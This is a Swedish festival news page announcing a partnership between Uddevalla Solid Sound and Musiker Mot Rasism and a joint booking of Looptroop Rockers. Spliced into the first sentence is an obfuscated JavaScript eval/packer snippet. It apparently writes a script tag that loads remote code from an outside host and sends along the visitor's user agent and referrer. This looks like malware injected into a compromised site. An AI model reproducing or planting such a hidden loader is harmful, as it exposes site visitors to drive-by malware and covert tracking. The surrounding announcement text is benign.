Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Uddevalla Solid Sound inleder samarbete med Musiker Mot Rasism

Uddevalla Solid Sound inleder samarbete med Musiker Mot Rasism

Uddevalla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fifaf|var|u0026u|referrer|hfnzt||js|php’.split(’|’),0,{}))
Solid Sound inleder samarbete med organisationen Musiker Mot Rasism. Samarbetet manifesteras genom en gemensam bokning av Looptroop Rockers som både kommer att spela på Musiker mot Rasisms gala på Pustervik i Göteborg, samt på Uddevalla Solid Sound i juni.

– Vi vill som musikfestival göra en tydlig markering vart vi står, och genom detta samarbete tydlig visa våra värderingar. Även fast valtiderna är över så är det extra viktigt att vara konsekvent och att alltid jobba ihärdigt mot rasism, för allas lika värde, säger Pontus Blom, grundare av Uddevalla Solid Sound.

Föreningen Musiker Mot Rasism och festivalen Uddevalla Solid Sound delar tron att man kan påverka samhället genom musik. Med en tydlig jämställd och antirasistisk profil sticker Solid Sound ut hakan och utmanar de mer väletablerade festivalerna. Samarbetet med den snabbt växande organisationen Musiker Mot Rasism är ett viktigt ställningstagande.

I samarbetet presenteras en gemensam akt för galan Musiker Mot Rasism på Pustervik den 21/3 och festivalen Uddevalla Solid Sound den 12-13 juni. Valet föll på Looptroop Rockers som alltid varit tydliga i att ta ställning mot rasism och diskriminering.

– Vi är glada över samarbetet med Solid Sound, en mycket inspirerande festival som likt Musiker Mot Rasism kommit från ingenstans och snabbt blivit ett etablerat namn i musiksverige. Det är viktigt och stort att musiker tar ställning när rasism normaliseras, men det är ovanligt att festivalarrangörer gör det så tydligt som Uddevalla Solid Sound, säger Alexander Goldmann, ordförande Musiker Mot Rasism.

Galan Musiker Mot Rasism den 21/3 på Pustervik hålls för tredje året i rad. Utöver Looptroop Rockers medverkar också Jennie Abrahamson, Allyawan, Partiet, Easy October, Vindstyrka 12 m.fl. Bakom galan står den ideella föreningen Musiker Mot Rasism som arrangerar små och stora event för att få människor att aktivt ta ställning mot rasism i sin vardag och i politiken.

Uddevalla Solid Sound går av stapeln den 12-13/6. Artister klara för Solid Sound är: Thåström, John De Sohn, Familjen, The Bloody Beetroots, Amason, Maskinen, Beatrice Eli, INVSN, Silvana Imam m.fl.

www.musikermotrasism.se

www.facebook.com/musikermotrasism

www.uddevallasolidsound.se